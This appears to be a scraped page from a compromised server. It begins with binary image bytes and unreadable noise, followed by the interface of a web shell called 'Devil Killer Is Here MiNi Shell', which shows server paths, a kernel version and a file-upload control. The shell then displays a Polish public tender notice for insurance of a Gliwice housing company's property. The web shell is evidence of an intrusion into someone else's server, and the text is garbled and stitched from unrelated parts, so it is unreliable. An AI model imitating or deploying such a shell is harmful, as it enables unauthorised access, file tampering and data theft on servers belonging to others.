JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231122/0050275301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowe ubezpieczenia majątkowe <br/>wraz z odpowiedzialnością cywilną </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD BUDYNKÓW MIEJSKICH II TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276590157</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Warszawska 35 B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@tbs2.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tbs2.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe ubezpieczenia majątkowe <br/>wraz z odpowiedzialnością cywilną </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ad3798a-886f-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00502753</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.tbs2.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a.stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b.komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z syst. operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub<br/>ich nowsze wersje,<br/>c.zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.<br/>d.włączona obsługa JavaScript,<br/>e.zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f.Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8,<br/>g.Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>2. Instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34;<br/>na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>3. Wszelkie zawiadomienia, oświadczenia, wnioski oraz informacje Zamawiający oraz Wykonawcy<br/>mogą przekazywać wyłącznie drogą elektroniczną poprzez platformę zakupową.<br/>4.Oferty, wnioski oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie<br/>muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub<br/>podpisem osobistym. W procesie składania oferty, wniosków, przedmiotowych środków dowodowych<br/>na platformie, kwalifikowany podpis elektroniczny wykonawca składa bezpośrednio na dokumencie,<br/>który następnie przesyła do systemu platformazakupowa.pl<br/>5.Oferta powinna być:<br/>a. sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b. złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl, c. podpisana<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>7. Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików<br/>muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji<br/>elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym<br/>(eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>8. W przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia<br/>odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>9. Wykonawca, za pośrednictwem platformazakupowa.pl może przed upływem terminu do składania<br/>ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w<br/>instrukcji zamieszczonej na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje<br/>10. Zgodnie z definicją dokumentu elektronicznego z art.3 ustęp 2 Ustawy o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne, opatrzenie pliku zawierającego skompresowane dane<br/>kwalifikowanym podpisem elektronicznym jest jednoznaczne z podpisaniem oryginału dokumentu, z<br/>wyjątkiem kopii poświadczonych odpowiednio przez innego wykonawcę ubiegającego się wspólnie z<br/>nim o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega wykonawca,<br/>albo przez podwykonawcę.<br/>11.Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do:<br/>złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 u.1i2 rozp. Parlamentu Europ. i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w spr. ochrony osób fizycznych w zw. z przetwarzaniem<br/>danych osobowych i w spraw(og. rozp. o ochr. danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:1)administratorem Pani/Pana danych osobowych jest ZBMIITBS Sp. zo.o., 44-100 Gliwice, ul.<br/>Warszawska 35b,<br/>tel. 32 231 03 95, e mail; biuro@tbs2.pl,2) w sprawach związ. z danymi proszę kontaktować się z<br/>inspektorem ochrony danych osobowych w ZBMIITBS Sp. z o.o. którym jest Anna Pawłowska, tel.<br/>322310395, e-mail rodo@tbs2.pl;3) Pani/Pana dane osobowe przetwarzane będą dla potrzeb<br/>niniejszego postępowania, na podstawie art. 6 u.1 lit. c RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich<br/>przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień<br/>publicznych spoczywający na Zamawiającym,4) odbiorcami Pani/Pana danych osobowych będą osoby<br/>lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art.<br/>74 Pzp,5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 u. 1 Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy,6) obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,7)w<br/>odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO,8) Posiada Pan/Pani:a) na podstawie art. 15 RODO<br/>prawo dostępu do swoich danych osobowych,b) na podstawie art. 16 RODO prawo do sprostowania<br/>lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub<br/>uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 u. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia, d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO,<br/>9) nie przysługuje Pani/Panu:a) w związku z art. 17 u. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych,b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,c)<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 u. 1 lit. c RODO.2.<br/>Jednocześnie Zamawiający przypomina o obowiązku informac. wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w zw. z prowadzonym<br/>postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w<br/>postępowaniu, chyba że ma zastos. co najmniej jedno z wyłączeń, o których mowa w art. 14 u. 5<br/>RODO.3. Zamawiający, informuje że Wykonawcy do oferty składają ośw. w zakresie wypełnienia<br/>obowiązków informac. przewidzianych w art. 13 lub art. 14 RODOie swobodnego przepływu takich danych oraz uchylenia dyr.<br/>95/46/WE</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">137A/2023/TR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje usługi ubezpieczeniowe:<br/>Ubezpieczenie mienia od wszystkich ryzyk<br/>Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk<br/>Ubezpieczenie odpowiedzialności cywilnej<br/>Ubezpieczenie od ognia innych zdarzeń losowych<br/>1.1 Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 1 do SWZ oraz ustalenia wynikający w<br/>projektowanych postanowieniach umowy. Wykonawca zobowiązany jest do zapoznania się z treścią SWZ oraz jej załącznikami.<br/>1.2 Na postawie art. 18 ust. 4 Pzp Zamawiający wskazuje, że informacje dotyczące wykazu zabezpieczeń są poufne i<br/>zgodnie z art. 280 ust 3 Pzp ustala się następujące wymagania dotyczące uzyskania dostępu do części poufnej SWZ oraz<br/>zachowania poufnego charakteru otrzymanych informacji:<br/>a) część SWZ objęta poufnością zostanie udostępniona Wykonawcy po złożeniu wniosku o udostępnienie części poufnej<br/>SWZ, którego wzór stanowi załącznik nr 1 A do SWZ. Na wskazany we wniosku adres poczty elektronicznej zostanie<br/>przesłany wykaz zabezpieczeń. Wykonawca, który otrzymał poufną część SWZ, zobowiązany jest do zachowania<br/>uzyskanych informacji w tajemnicy, gdyż ich ujawnienie może prowadzić do powstania szkody. W przypadku naruszenia<br/>obowiązku poufności Zamawiający jest uprawnionych do dochodzenia swoich praw na zasadach ogólnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515200-5 - Usługi ubezpieczenia własności</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za rozszerzenie ochrony poprzez zwiększenie limitu dla ryzyka katastrofa budowlana z kwoty limitu odpowiedzialności (na jedno i wszystkie zdarzenia) - 5 000 000,00 PLN, na kwotę limitu odpowiedzialności (na jedno i wszystkie zdarzenia) – 8 000 000,00 PLN</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za włączenie klauzuli nr F 01 - funduszu prewencyjnego do przedmiotu zamówienia. Przez fundusz prewencyjny rozumie się 10% wartości płaconych składek za ubezpieczenia. Cel prewencyjny określa Zamawiający, a akceptuje ubezpieczyciel, w terminie do 30 dni od złożenia wniosku przez Zamawiającego. Zamawiający rozlicza fundusz prewencyjny z Wykonawcą na podstawie faktur – przed zakończeniem umowy ubezpieczenia.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">7</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za włączeniem klauzuli nr F 02- wyrównania sum ubezpieczenia i limitów odpowiedzialności: Ubezpieczyciel automatycznie wyrówna sumy ubezpieczenia i limity odpowiedzialności w klauzulach w przypadkach po wypłacie odszkodowań i wyczerpaniu sumy lub limitu. Naliczenie składki za przywrócenie sumy ubezpieczenia lub limitu będzie zgodnie z klauzulą niezmienności stawek. Wyrównanie automatyczne sum ubezpieczenia lub limitów może wystąpić tyko dwukrotnie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">: Za włączenie Klauzula nr F 03 - przeoczenia zgłoszenia mienia do ubezpieczenia: Ubezpieczyciel zobowiązany jest do wypłaty odszkodowania w przypadku nie zgłoszenia mienia w trakcie trwania umowy ubezpieczenia. Składka oraz limit odpowiedzialności Ubezpieczyciela za mienie nie zgłoszone będzie naliczona zgodnie klauzulą automatycznego pokrycia. Należna składka z tego tytułu może być potrącona z odszkodowania.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">1,00</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za włączeniem Klauzuli nr 04 automatycznego przywrócenia sumy ubezpieczenia po szkodzie Ubezpieczyciel automatycznie wyrówna sumę ubezpieczenia danego ubezpieczonego mienia w systemie na sumy stałe. Ubezpieczone mienie nie ulega zmniejszeniu – konsumpcji, po wypłacie odszkodowania. Niniejsza klauzula ma zastosowanie do mienia od wszystkich ryzyk w tym sprzętu elektronicznego. Natomiast niniejsza klauzula nie będzie miała zastosowania w przypadku mienia przeznaczonego do likwidacji po szkodzie. Naliczenie składki za wyrównanie sumy ubezpieczenia będzie zgodnie z klauzulą niezmienności stawek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 7</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za włączenie Klauzula nr F 05 - przezornej sumy ubezpieczenia: Ustala się że do sumy ubezpieczenia zostaje włączona kwota przezornej sumy ubezpieczenia przez którą rozumie się kwotę, która będzie służyć do wyrównania ewentualnego niedoubezpieczenia wynikającego z niedoszacowania sum ubezpieczenia dla poszczególnych składników majątku i/lub w odniesieniu do których suma ubezpieczenia jest niewystarczająca ze względu na poniesione koszty związane z uniknięciem lub ograniczeniem rozmiaru szkody Limit odpowiedzialności (na jedno i wszystkie zdarzenia) 500 000,00 PLN</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 8</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za zwiększenie sumy gwarancyjnej w ubezpieczeniu obowiązkowym odpowiedzialności cywilnej Deliktowo-Kontraktowej z kwoty – 700 000,00 PLN na kwotę – 1 000 000,00 PLN</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 9</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za rozszerzenie ochrony poprzez zwiększenie limitu w ubezpieczeniu Odpowiedzialności Cywilnej w szkodach z tytułu szkód w środowisku z kwoty podlimitu – 30 000,00 PLN na kwotę podlimitu – 50 000,00 PLN</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">1</span></h3> <h3 class="mb-0">Kryterium 10</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za rozszerzenie ochrony poprzez zwiększenie limitu w ubezpieczeniu Odpowiedzialności Cywilnej w szkodach z tytułu czystych strat finansowych z kwoty podlimitu – 50 000,00 PLN na kwotę podlimitu – 100 000,00 PLN</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4</span></h3> <h3 class="mb-0">Kryterium 11</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za rozszerzenie ochrony poprzez zwiększenie limitu w ubezpieczeniu Odpowiedzialności Cywilnej OC pracodawcy z kwoty podlimitu – 50 000,00 PLN na kwotę podlimitu –100 000,00 PLN</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">Kryterium 12</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za zwiększenie sumy gwarancyjnej w 